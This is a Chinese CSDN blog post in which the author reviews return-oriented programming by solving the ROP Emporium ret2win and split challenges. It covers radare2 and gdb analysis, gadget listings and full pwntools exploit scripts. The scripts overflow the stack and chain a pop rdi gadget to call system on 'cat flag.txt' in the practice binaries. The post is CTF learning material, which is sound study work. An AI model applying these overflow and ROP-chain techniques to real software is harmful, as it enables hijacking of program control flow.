从头复习ROP(持续更新中)

最新推荐文章于 2022-05-21 15:55:22 发布
最新推荐文章于 2022-05-21 15:55:22 发布
阅读量610 收藏 2
点赞数
分类专栏: CTF_PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/s1054436218/article/details/101917618
版权

从头复习ROP

 

一、前言

  从考研结束就一直很浮躁,虽然在实习期间学习运用了一段时间web技术,但是新东西总是不想看,旧的东西又不断忘记。9月研究生开学,也算是新的开始了,沉下心来沉淀一些东西吧。感觉在学校的期间学习二进制是最合适的,所以潜下心来把二进制捡起来。

  话不多说了,开始吧。
 

二、参考资料

  大佬们的资料都很浅显易懂,作为基础知识一定要先读一下:

一步一步学ROP之linux_x86篇(原创乌云,所以只能贴个盗版地址了)
http://www.vuln.cn/6645

一步一步学ROP之linux_x64篇(原创乌云,所以只能贴个盗版地址了)http://www.vuln.cn/6644

CTF All In One(3.1.4章):https://firmianay.gitbooks.io/ctf-all-in-one/doc/3.1.4_rop_x86.html
 

三、软件工具

以下是本文中用到的一些工具,其中的链接都包含如何安装,故在此不详细介绍安装过程。由于想尽可能训练二进制能力,所以本文将尽可能避免使用IDA进行反编译分析。

radare2(一个功能十分强大的汇编工具)

pwndbg(gdb的一个热门插件,本文并不涉及堆的知识,因此此工具使用较少,但其提供了一个比较清晰的分析界面。)

pwntools(做二进制写脚本必备的python库)

IDA Pro 这个各位在52上下载吧

 

四、一些基础内容

  基础是很重要的,想了解二进制的内容必定是要了解一些汇编语言以及底层的函数调用机制等等。所幸在本科接触二进制的时候一定程度上了解了汇编语言的一些语法、栈与函数调用的关系、二进制文件的几种保护机制等等。所以本篇主要还是用以题目实践来复习的方式复习之前学到的知识。本人才疏学浅,如果有说错的地方大佬们勿喷。
 

五、Ropemporium题目实践(后续可能会更新)

5.1 ret2win

5.1.1 ret2win32

  使用radare2打开文件并进行分析(这里之所以不用IDA是想熟悉一下如何使用r2):

  经过分析后,我们可以查看elf文件的保护机制、函数列表、汇编代码、字符串列表、交叉引用以及寻找gadget等等。此时我们可以查看文件调用了哪些函数以及使用了哪些字符串(afl是用来查看所调用的函数情况,而iz可以查看所调用的字符串):

  悉心的话,可以看到其中的关键字符串 /bin/cat flag.txt。我们查看其引用位置,在sym.ret2win中:

  然后查看ret2win的引用情况,发现它没有被调用:

  查看此处的汇编代码:

  可见此处直接cat flag了,因此我们的目标就是通过栈溢出让函数跳转到此处。使用pwntools自带的函数构造污点,然后在gdb中运行程序:

  可见此时EIP的值为’laaa’,我们计算一下栈溢出的偏移:

  使用pwntools写脚本,构造payload:

from pwn import *
p = process('./ret2win32')
print p.recvline()
print p.recvline()
payload = 'a'*44 + p32(0x08048659)
p.sendline(payload)
p.interactive()

5.1.2 ret2win(64位)

  几乎和32位程序同理。就是偏移会少4位。

  以下是payload:

from pwn import *
p = process("ret2win")
print p.recvline()
print p.recvline()
payload = 'a'*40 + p64(0x400811)
p.sendline(payload)
p.interactive()

5.2 split

5.2.1 split32

  先来查看源码吧:

  很明显,上述输入存在栈溢出,我们可以使用gdb来获取偏移:

  把污点拿回pwntools进行计算(貌似ropemporium里偏移都是一样的,但是我觉得还是每次都应该来计算一次):

  可见此处需要的偏移是44,我们在看看它的字符串和plt表吧:

  此处我们可以注意到它的plt表中存在system函数,我们可以直接调用,此外,此处它的字符串中还有cat flag.txt,我们也可以直接利用。使用pwntools脚本如下:

from pwn import *
p = process('./split32')
system_plt = 0x08048430
cat_flag_str = 0x0804a030

#此处使用44个'a'来填充栈,在第45位开始返回到system函数
payload = 'a'*44
#system地址后的4个'a'是system调用完成返回后的地址
#由于我们这里并不打算做后续操作,所以任意填写了4个'a'进行代替
#后面的cat_flag_str是我们system所希望使用的参数
payload += p32(system_plt) + 'a'*4 + p32(cat_flag_str)
print p.recvline()
print p.recvline()
p.sendline(payload)
p.interactive()

5.2.2 split(64位)

  思路与上面大同小异,也是偏移少了4位,但注意,64位和32位程序有个很重要的区别就是64位程序调用的前6个参数是依次保存在RDI, RSI, RDX, RCX, R8和 R9中,如果还有更多的参数才会保存到栈上。总之,我们是需要寻找Gadget,来把我们需要的参数pop到需要的寄存器上。

  如我们本题所遇到的情况,我们只需要一个参数来传递字符串”cat flag.txt”的地址,形如:

pop edi
ret

  这样的汇编代码,我们跳到此位置就可以把需要调用的参数pop到edi上,然后在下一个地址存我们要返回的函数地址即system。

  寻找gadget可以用安装pwntools自带的ROPgadget:

➜  split ROPgadget --binary split --only "pop|ret"             
Gadgets information
============================================================
0x000000000040087c : pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
0x000000000040087e : pop r13 ; pop r14 ; pop r15 ; ret
0x0000000000400880 : pop r14 ; pop r15 ; ret
0x0000000000400882 : pop r15 ; ret
0x000000000040087b : pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
0x000000000040087f : pop rbp ; pop r14 ; pop r15 ; ret
0x00000000004006b0 : pop rbp ; ret
0x0000000000400883 : pop rdi ; ret
0x0000000000400881 : pop rsi ; pop r15 ; ret
0x000000000040087d : pop rsp ; pop r13 ; pop r14 ; pop r15 ; ret
0x00000000004005b9 : ret

Unique gadgets found: 11

  可见我们需要的gadget:pop rdi ; ret在地址0x400883处。

  我们再查看一下64位程序中system的plt:

[0x00400650]> afl
0x00400650    1 41           entry0
0x00400610    1 6            sym.imp.__libc_start_main
0x00400680    4 50   -> 41   sym.deregister_tm_clones
0x004006c0    4 58   -> 55   sym.register_tm_clones
0x00400700    3 28           entry.fini0
0x00400720    4 38   -> 35   entry.init0
0x004007b5    1 82           sym.pwnme
0x00400600    1 6            sym.imp.memset
0x004005d0    1 6            sym.imp.puts
0x004005f0    1 6            sym.imp.printf
0x00400620    1 6            sym.imp.fgets
0x00400807    1 17           sym.usefulFunction
0x004005e0    1 6            sym.imp.system

  可见system的plt位置是0x4005e0。再查看一下cat flag.txt字符串的地址:

[0x00400650]> iz
[Strings]
Num Paddr      Vaddr      Len Size Section  Type  String
000 0x000008a8 0x004008a8  21  22 (.rodata) ascii split by ROP Emporium
001 0x000008be 0x004008be   7   8 (.rodata) ascii 64bits\n
002 0x000008c6 0x004008c6   8   9 (.rodata) ascii \nExiting
003 0x000008d0 0x004008d0  43  44 (.rodata) ascii Contriving a reason to ask user for data...
004 0x000008ff 0x004008ff   7   8 (.rodata) ascii /bin/ls
000 0x00001060 0x00601060  17  18 (.data) ascii /bin/cat flag.txt

  本题的exp如下:

from pwn import *
p = process('./split')
pop_edi_ret_gadget = 0x00400883
cat_flag_str       = 0x00601060
system_plt         = 0x004005e0

#添加偏移
payload = 'a'*40
#跳转到我们之前所找到的gadget
payload += p64(pop_edi_ret_gadget)
#利用gadget将cat flag.txt字符串地址pop到edi寄存器上
#再通过ret跳转到system的plt表处
payload += p64(cat_flag_str) + p64(system_plt)
print p.recvline()
print p.recvline()
p.sendline(payload)
p.interactive()
b0ring
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
基本ROP讲解
zz_strive_2012的专栏
06-23 396
https://baijiahao.baidu.com/s?id=1665277270769279870&wfr=spider&for=pc
x86 架构的内存攻击技术 ROP(一)
个人笔记
04-05 1949
返回导向编程(Return-Oriented Programming,ROP)是一种高级的内存攻击技术,主要是为了绕过操作系统的防御手段 NX。该技术往往利用一些已有的漏洞,特别是缓冲区溢出,攻击者控制堆栈调用以劫持程序控制流并执行针对性的机器语言指令序列(gadgets),这些 gadget 组合,就能成功执行我们自己的逻辑。
【pwn学习】ROP(更新)
Morphy_Amo的博客
12-10 710
什么是ROPROP(Return Oriented Programming),其主要思想是在栈缓冲区溢出的基础上,利用程序已有的小片段(gadgets)来改变某些寄存器或者变量的值,从而控制程序的执行流程。 gadgets就是以ret结尾的指令序列。 ROP主要是针对NX保护而诞生的方法,NX开启后,难以直接向栈或者堆上注入代码,因此需要利用gadgets来构建可控的程序流。
从c语言到汇编指令 长亭科技,从0开始CTF-PWN(四)ROP绕过栈可执行保护与GOT表劫持...
weixin_34440860的博客
05-21 314
int main(int argc, char* argv[]) {char buf[128];if (argc < 2) return 1;strcpy(buf, argv[1]);printf("Input:%sn", buf);return 0;}使用如下命令进行编译:gcc-4.8 -g -m32 -O0 -fno-stack-protector -o pwn_test_bof3_3...
(Pwn)CTF工具 ROPgadget 的安装与使用介绍
热门推荐
半岛铁盒的博客
03-10 1万+
一. 介 绍 使用此工具,您可以在二进制文件搜索Gadgets,以方便您对ROP的利用。 我们知道x86都是靠栈来传递参数的而x64换了它顺序是rdi, rsi, rdx, rcx, r8, r9,(这里6个寄存器可以被理解为Gadgets)如果多于6个参数才会用栈我们要先知道这个特性. 有的题,里面既没有现成的system也没有/bin/sh字符串,也没有提供libc.so给我们,那么我们要做的就是想办法泄露libc地址,拿到system函数和/bin/sh字符串; 我们就需要获取rdi, rsi,
rop轻松谈.pdf
10-21
ROP(Return Oriented Programming)是一種exploit技术,該技術通過在程式碼注入惡意代碼,控制程式的執行流程,達到攻擊的目的。本文將對ROP技術進行詳細的介紹,涵蓋ROP的基本概念、Buffer Overflow、ret2libc/...
rop开放平台
04-12
rop开放平台s
rop-master.rar
11-04
RopRop 是 Rapid Open PlatformRapid Open Platform Rapid Open Platform Rapid Open PlatformRapid Open Platform Rapid Open PlatformRapid Open PlatformRapid Open Platform Rapid Open PlatformRapid Open ...
rOpbaby-CTFPWN ROP练习题
08-21
DefConCTF 2015 Quals CTFPWN ROP练习题 可用于练习基础的ROP
idarop:IDA的ROP数据库插件
05-15
Idarop是一个IDA插件,它列出并存储打开的二进制文件存在的所有ROP小工具。 该代码库是从未维护的IDA插件复制而来的。 但是, idasploiter旨在在运行时运行(提升IDA调试器API),而idarop则旨在采用一种更加静态...
初探ROP
KKABqN
03-16 2838
文章目录0x01 前言0x02 什么是ROP0x03 为什么要ROP0x04 基本ROPret2shellcode含义从原理解析ret2shellcode从例子解析ret2shellcode发现利用点确定利用前提调试扩展点ret2text含义从例子解析ret2text发现利用点确定利用前提调试ret2syscall含义从例子解析ret2syscall的方法细说系统调用在ret2syscal......
ROP----The Solution For Ret2win
weixin_30924239的博客
06-05 524
App:ret2win https://ropemporium.com/binary/ret2win.zip https://ropemporium.com/binary/ret2win32.zip Target:Locate a method within the binary that you want to call and do so by overwriting a sa...
小白详解rop emporium
BadRer的博客
08-02 2086
小白详解rop emporium 前言 rop emporium网站上提供了许多构造rop的challenge,作为小白的我从这里开始,专注于rop链的构造。 ps:写完放了好久结果没投出去,我好菜啊-。- 题目 0x0 ret2win32 IDA打开,很容易找到溢出点 char s; // [esp+0h][ebp-28h]可以看出s距ebp的偏移为0x28 m...
64位函数参数传递方式
qq_35467337的博客
03-08 1万+
64位函数传参方式
【HUST】信息系统安全:系统调用介入作业,安全策略制定,编写简单的64位ret2libc攻击程序
weixin_45695828的博客
05-21 1275
本次实验内容: 针对第一次作业的代码,利用seccomp方法进行对程序进行约束,使得attacker只能将/tmp/flag的内容,向标准输出(STDOUT )进行输出,且只能输出 32 bytes的内容。 要求: 1. 实现上述约束方法; 2. 通过attack,验证上述约束方法的效果,attack包括:1)调用system函数创建shell(或直接调用execve,或调用其它系统调用);2)向其它目标输出内容(如:STDERR)、输出长度调整(超过32 bytes)。 虽然说...
一步一步学 ROP 之 linux_x64 篇-level5
weixin_43489686的博客
02-02 1508
这道题是来自蒸米的一步一步学ROP之linux_x64篇的level5,主要考察的是ROP的__libc_csu_init。 原理 __libc_csu_init这个函数是用来对libc进行初始化操作的,一般的程序都会调用libc函数,所以一般都会有这个函数。 .text:00000000004005C0 ; void _libc_csu_init(void) .text:00000000...
再探ROP(上)
KKABqN
04-07 1549
0x00 前记 毕设和论文要搞吐了,再加上实习驻场事情,近期又要开始准备HW的事情,只能先更新一部分。 0x01 从x86到x64 之前的rop都是32bit的程序,由于这篇文章涉及的方法用于64bit的程序,这里先说一下两者的区别,做一下过渡。 首先是寄存器传参和堆栈传参的区别,这里以一个例子说明 在32bit的程序,如上图所示,在函数调用前,参数会被依次入栈;然而再64bit的同...............
基本ROP技巧总结
极目楚天舒的博客
05-06 5618
ROP攻击前提:存在栈溢出并且可以控制返回地址存在满足条件的gadget,如果开启了PIE保护则要想办法泄露gadget的地址ret2text程序本身存在类似于system('/bin/sh')或者execv('/bin/sh')的片段,我们可以直接将返回地址覆盖为其地址跳转到已有代码上。例子:TODOret2shellcode这种方法要求我们自己构造shellcode并控制程序跳转到我们构造的s...
二进制安全之NX绕过方法--ROP技术
Hvnt3r的博客
03-06 2688
二进制安全之NX绕过方法–ROP技术 原文地址 在之前的缓冲区溢出的实验,溢出到栈的shellcode可以直接被系统执行,给系统安全带来了极大的风险,因此NX技术应运而生,该技术是一种在CPU上实现的安全技术,将数据和命令进行了区分,被标记为数据的内存页没有执行权限,因此即使将恶意shellcode写入到执行流程也会因缺少执行权限而利用失败,在一定程度上提高了系统的安全性,但是所有安全都是绝...
pwnyools ROP模块
最新发布
08-25
ROP (Return-Oriented Programming) 是一种利用现有程序已存在的代码片段来构造恶意代码执行的技术。pwnyools 是一个 Python 库,它提供了一些用于创建和利用 ROP 载荷的工具。 pwnyools 的 ROP 模块包含了一些用于构建 ROP 链的函数和工具。通过这些函数和工具,攻击者可以构造一个有效的 ROP 链,并利用程序已存在的代码片段来执行任意的恶意操作。 使用 pwnyools 的 ROP 模块,你可以通过以下步骤来构建一个 ROP 链: 1. 确定目标程序的漏洞点,并确定能够利用的已存在的代码片段。 2. 构造一个 ROP 链,包含一个或多个已存在的代码片段(即 gadget)。 3. 将 ROP 链注入到目标程序,使之执行恶意操作。 请注意,使用 ROP 技术进行攻击是非常复杂和高级的技术,需要对底层计算机架构和二进制编程有深入的了解。此外,利用 ROP 进行攻击也可能涉及到绕过安全措施和使用特定的漏洞利用技巧。 在使用 pwnyools 的 ROP 模块进行开发或研究时,请务必遵守法律和道德规范,仅用于合法的目的,避免对他人造成损害。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值